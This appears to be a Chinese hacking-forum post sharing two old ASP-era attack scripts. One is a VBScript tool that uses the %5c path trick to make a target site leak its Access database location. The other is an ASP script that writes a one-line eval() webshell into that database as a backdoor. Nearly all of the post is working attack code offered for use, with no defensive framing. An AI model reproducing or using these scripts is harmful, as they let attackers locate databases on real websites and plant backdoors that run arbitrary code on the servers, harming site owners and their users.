N年前的兩個(gè)腳本%5c暴庫(kù)

2020-06-26 18:11:18

字體：大中小

供稿：網(wǎng)友

Ｎ年前，那時(shí)估計(jì)知道%5c暴庫(kù)的人還很少。這個(gè)vbs腳本應(yīng)當(dāng)是Lilo寫的,應(yīng)當(dāng)深深表達(dá)一下敬意……

Dim xStatus,tStatus,vServer,vHeader,vRsBody
GetError=InputBox("請(qǐng)輸入網(wǎng)站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","請(qǐng)輸入網(wǎng)址","http://www.hackerxfiles.com/files/list.asp?id=415")
If GetError = "" Then
MsgBox("輸入錯(cuò)誤，程序結(jié)束！")
WScript.Quit
End If

GetError=StrReverse(GetError)
Tem2=0
For I=1 To Len(GetError)
If Mid(GetError,I,1) = Chr(47) And Tem2=0 Then
Temp=Temp & "c5%"
Tem2=Tem2+1
Else
Temp=Temp & Mid(GetError,I,1)
End If
Next
GetError=StrReverse(Temp)

Call xmlPost(GetError)
ErrorText = vServer & " " & xStatus
BaseSaver = GetStr(vRsBody,"找不到文件 '","'。</font>" & Chr(10))
If BaseSaver="[None]" Then
BaseSaver = GetStr(vRsBody,"<font face="&Chr(34)&"宋體"&Chr(34)&" size=2>'","'不是一個(gè)有效的路徑。")
End If
If BaseSaver="[None]" Then
BaseSaver = GetStr(vRsBody,"打開注冊(cè)表關(guān)鍵字 '","'。</font>")
End If

If BaseSaver = "[None]" Then
AllReturn= "<TITLE>Mappath出錯(cuò)獲取數(shù)據(jù)庫(kù)地址 Lilo</TITLE><Body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><B>" & ErrorText & "</B><BR><BR><textarea rows='15' name='S1' cols='57'>" &vRsBody& "</textarea>"
Else
AllReturn= "<TITLE>Mappath出錯(cuò)獲取數(shù)據(jù)庫(kù)地址 Lilo</TITLE><Body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><B>" & ErrorText & "</B><BR><BR><textarea rows='15' name='S1' cols='57'>" &BaseSaver& "</textarea>"
End If

Call OpenWin(AllReturn)
Set WHShell = WScript.CreateObject("WScript.Shell")
WHShell.AppActivate "Mappath出錯(cuò)獲取數(shù)據(jù)庫(kù)地址 Lilo"
'WHShell.SendKeys ("%{TAB}")
Set WHShell = Nothing

Function URLEncoding(vstrIn)
strReturn = ""
For i = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,i,1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00)/ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function

Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function

Function xmlPost(iURL)
On Error Resume Next
iPost=URLEncoding(iPost)
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.open "POST",iURL,False
xPost.Send
xStatus = xPost.Status
tStatus = xPost.StatusText
vServer = xPost.GetResponseHeader("Server")
vHeader = xPost.GetAllResponseHeaders
vRsBody = bytes2BSTR(xPost.responseBody)
Set xPost = Nothing
End Function

Function GetStr(vString,iString,dString)
vSum = inStr(vRsBody,iString)
If vSum = 0 Then GetStr="[None]" : Exit Function
eSum = inStr(vSum,vRsBody,dString)
If eSum = 0 Then GetStr="[None]" : Exit Function
GetStr = Mid(vRsBody,vSum+Len(iString),eSum-vSum-Len(iString))
End Function

Function IntToStr(vNum,vLen)
If Len(vNum) >= vLen Then IntToStr = vNum : Exit Function
For I=1 To vLen-Len(vNum)
IntToStr=IntToStr & "0"
Next
IntToStr = IntToStr & CStr(vNum)
End Function

Function GetSplit(unStr,vaStr,Mode)
aTemp = Split(unStr,vaStr)
bTemp = Ubound(aTemp)
Select Case Mode
Case -1: GetSplit = aTemp
Case -2: GetSplit = bTemp
End Select
If Mode < 0 Then Exit Function
If Mode > bTemp Then GetSplit=False : Exit Function
If Mode >= 0 Then GetSplit = aTemp(Mode)
End Function

Function OpenWin(vTTv)
Set IE = WScript.CreateObject("InternetExplorer.Application")
IE.Navigate "about:blank"
IE.Visible = 1
IE.ToolBar = 0
IE.StatusBar = 0
IE.Width=500
IE.Height=335
Do While (IE.Busy): Loop
Set Doc = IE.Document
Doc.Open
Execute "Doc.Writeln " & Chr(34) & vTTv & Chr(34)
Doc.Close
Set IE=Nothing
End Function

另一個(gè)是我寫的，向access里插入asp代碼來當(dāng)作后門，這應(yīng)當(dāng)是我的首創(chuàng)了，不過我也不知其他人有沒有更早提前發(fā)現(xiàn)的。后來網(wǎng)上就流傳開直接向數(shù)據(jù)庫(kù)插入一句話來得到webshell。不知不覺時(shí)光飛逝，4年過去了，人老了，難道只能懷舊嗎？

<%

db="0123.asp" '這里改成您的數(shù)據(jù)庫(kù)地址
set conn=server.createobject("Adodb.Connection")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(db)
conn.open connstr
'添加notdownload表
conn.execute("create table notdownload(notdown oleobject)")
'寫入<%數(shù)據(jù)
set rs=server.createobject("adodb.recordset")
    sql="select * from notdownload"
rs.open sql,conn,1,3
rs.addnew
    rs("notdown").appendchunk(chrB(asc("<")) & chrB(asc("s")) & chrB(asc("c"))& chrB(asc("r")) & chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(" "))& chrB(asc("r"))& chrB(asc("u"))& chrB(asc("n"))& chrB(asc("a"))& chrB(asc("t"))& chrB(asc("="))& chrB(asc("s"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc("v"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc(" "))& chrB(asc("l"))& chrB(asc("a"))& chrB(asc("n"))& chrB(asc("g"))& chrB(asc("u"))& chrB(asc("a"))& chrB(asc("g"))& chrB(asc("e"))& chrB(asc("="))& chrB(asc("j"))& chrB(asc("a"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">"))& chrB(asc("e"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("l"))& chrB(asc("("))& chrB(asc("r"))& chrB(asc("e"))& chrB(asc("q"))& chrB(asc("u"))& chrB(asc("e"))& chrB(asc("s"))& chrB(asc("t"))& chrB(asc("."))& chrB(asc("f"))& chrB(asc("o"))& chrB(asc("r"))& chrB(asc("m"))& chrB(asc("("))& chrB(asc("'"))& chrB(asc("#"))& chrB(asc("'"))& chrB(asc(")"))& chrB(asc("+"))& chrB(asc("'"))& chrB(asc("'"))& chrB(asc(")"))& chrB(asc("<"))& chrB(asc("/"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">")))
    rs.update
    rs.close
set rs=nothing
'關(guān)閉連接
conn.close
set conn=nothing
%>

上一篇：非常棒的lcx寫的非常規(guī)運(yùn)行vbs

下一篇：vbs算命測(cè)試一下你上輩子是男是女